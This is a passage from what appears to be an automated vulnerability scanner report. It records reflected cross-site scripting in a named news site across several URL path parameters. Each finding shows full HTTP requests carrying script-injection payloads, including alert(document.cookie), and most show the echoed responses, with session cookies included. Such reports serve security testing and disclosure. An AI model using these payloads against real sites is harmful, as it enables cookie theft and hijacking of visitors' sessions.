en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 22:11:13 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 22:11:13 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... ertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/20112b157\"><script>alert(1)</script>b60a879cda8/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home ...[SNIP]...
The value of REST URL parameter 13 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1329"><script>alert(1)</script>c2a1dd86290 was submitted in the REST URL parameter 13. This input was echoed as b1329\"><script>alert(1)</script>c2a1dd86290 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01b1329"><script>alert(1)</script>c2a1dd86290/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 22:12:02 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 22:12:02 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... document.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01b1329\"><script>alert(1)</script>c2a1dd86290/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/th ...[SNIP]...
The value of REST URL parameter 14 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7965"><script>alert(1)</script>e192b52f48d was submitted in the REST URL parameter 14. This input was echoed as b7965\"><script>alert(1)</script>e192b52f48d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20hrefb7965"><script>alert(1)</script>e192b52f48d=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 22:13:24 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 22:13:24 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... 9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20hrefb7965\"><script>alert(1)</script>e192b52f48d=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/t ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b86c"><script>alert(1)</script>9c6f7d2a56a was submitted in the REST URL parameter 1. This input was echoed as 9b86c\"><script>alert(1)</script>9c6f7d2a56a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C9b86c"><script>alert(1)</script>9c6f7d2a56a/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 21:41:45 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:41:45 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C9b86c\"><script>alert(1)</script>9c6f7d2a56a/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%2 ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d7a"><script>alert(1)</script>ebcd9b22215 was submitted in the REST URL parameter 2. This input was echoed as 89d7a\"><script>alert(1)</script>ebcd9b22215 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b89d7a"><script>alert(1)</script>ebcd9b22215/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 21:43:36 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:43:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b89d7a\"><script>alert(1)</script>ebcd9b22215/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b19a"><script>alert(1)</script>5db2c1a0144 was submitted in the REST URL parameter 3. This input was echoed as 5b19a\"><script>alert(1)</script>5db2c1a0144 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/20115b19a"><script>alert(1)</script>5db2c1a0144/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 21:50:04 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:50:04 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/20115b19a\"><script>alert(1)</script>5db2c1a0144/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.geti ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 970f5"><script>alert(1)</script>d569fa43d1a was submitted in the REST URL parameter 4. This input was echoed as 970f5\"><script>alert(1)</script>d569fa43d1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01970f5"><script>alert(1)</script>d569fa43d1a/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 21:51:34 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:51:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01970f5\"><script>alert(1)</script>d569fa43d1a/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimag ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e25d"><script>alert(1)</script>4b752dcaa3 was submitted in the REST URL parameter 5. This input was echoed as 6e25d\"><script>alert(1)</script>4b752dcaa3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/256e25d"><script>alert(1)</script>4b752dcaa3/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 21:53:31 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:53:31 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/256e25d\"><script>alert(1)</script>4b752dcaa3/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesi ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc0c"><script>alert(1)</script>36af2f7b086 was submitted in the REST URL parameter 6. This input was echoed as acc0c\"><script>alert(1)</script>36af2f7b086 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffmanacc0c"><script>alert(1)</script>36af2f7b086/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; 